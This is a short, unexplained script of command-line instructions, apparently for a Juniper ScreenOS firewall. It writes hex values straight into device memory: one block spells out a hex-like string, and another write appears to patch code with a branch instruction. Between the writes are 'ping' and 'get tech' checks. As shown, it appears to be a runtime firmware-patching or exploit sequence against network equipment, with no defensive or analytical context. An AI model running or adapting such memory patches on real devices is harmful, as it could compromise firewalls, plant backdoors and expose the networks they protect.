set mem addr 0x195bd40 0x000636f0
ping
set mem addr 0x1a7bdb8 0x4d333241
set mem addr 0x1a7bdbc 0x3145432c
set mem addr 0x1a7bdc0 0x3031653a
set mem addr 0x1a7bdc4 0x33443230
set mem addr 0x1a7bdc8 0x30303334
set mem addr 0x1a7bdcc 0x33383630
set mem addr 0x1a7bdd0 0x34383030
set mem addr 0x1a7bdd4 0x62303639
set mem addr 0x1a7bdd8 0x32623134
set mem addr 0x1a7bddc 0x33643230
set mem addr 0x1a7bde0 0x30303639
set mem addr 0x1a7bde4 0x36313239
set mem addr 0x1a7bde8 0x37373334
set mem addr 0x1a7bdec 0x37643238
set mem addr 0x1a7bdf0 0x30336136
set mem addr 0x1a7bdf4 0x34653830
set mem addr 0x1a7bdf8 0x30303230
set mem addr 0x1a7bdfc 0x00000000
set mem addr 0x195bd40 0x0032a038
get tech | in juniper
ping
set mem addr 0x636d0 0x60630300
set mem addr 0x195bd40 0x000636f0
get tech | in juniper
ping
set mem addr 0x3421d4 0x48000014
set mem addr 0x195bd40 0x00640eac
